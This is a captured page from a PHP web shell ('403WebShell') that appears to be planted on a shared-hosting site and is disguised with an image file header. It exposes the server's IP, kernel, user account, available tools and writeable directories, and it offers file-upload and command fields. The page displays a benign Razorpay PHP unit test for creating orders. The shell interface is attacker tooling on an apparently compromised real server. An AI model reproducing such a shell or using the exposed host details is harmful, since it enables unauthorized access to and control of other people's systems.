����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.147.78.141
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/bofirm.gltechlimited.com/vendor/razorpay/razorpay/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/bofirm.gltechlimited.com/vendor/razorpay/razorpay/tests/ExceptionTest.php
<?php

namespace Razorpay\Tests;

use Razorpay\Api\Request;
use Razorpay\Api\Errors;

class ExceptionTest extends TestCase
{
    public function setUp(): void
    {
        parent::setUp();
    }
    
    /**
     * Create an order from json payload
     */
    public function testCreateJsonOrderException()
    {
        $payload = $this->payload();
        $attribute = json_encode($payload);
        try
        {
         $data = $this->api->order->create($attribute);

         $this->assertTrue(is_array($data->toArray()));

        }
        catch(Error $e){
            throw new InvalidArgumentException($e);
        }
    }

    /**
     * Create an order from set header application/json
     */
    public function testCreateOrderSetHeaderException()
    {
        $attribute = $this->payload();
        
        try
        {
         $this->api->setHeader('content-type', 'application/json');

         $data = $this->api->order->create($attribute);

         $this->assertTrue(is_array($data->toArray()));
        
        }
        catch(Error $e){
            throw new InvalidArgumentException($e);
        }
    }

    /**
     * Create an order
     */
    public function testCreateOrderSuccess()
    {
        $attribute = $this->payload();
        try
        {   
         $data = $this->api->order->create($attribute);

         $this->assertTrue(is_array($data->toArray()));

        }
        catch(Error $e){
            throw new InvalidArgumentException($e);
        }
    }
    
    private function payload(){
        $date = new \DateTime();
        $receiptId = $date->getTimestamp();
        return [
                 "receipt"=> (string) $receiptId,
                 "amount"=>54900,
                 "currency"=>"INR",
                 "payment_capture"=>1,
                 "app_offer"=>0,
                 "notes" => [
                    "woocommerce_order_number" => 240186
                 ],
                 "line_items_total" => 54900,
                 "line_items" => [
                        [
                            "type" => "e-commerce",
                            "sku"=> "",
                            "variant_id" => "211444",
                            "price" => "54900",
                            "offer_price" => "54900",
                            "quantity" => 1,
                            "name" => "Personalised Kids T-shirts",
                            "description" => "description"
                        ]
                    ]
                ];
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit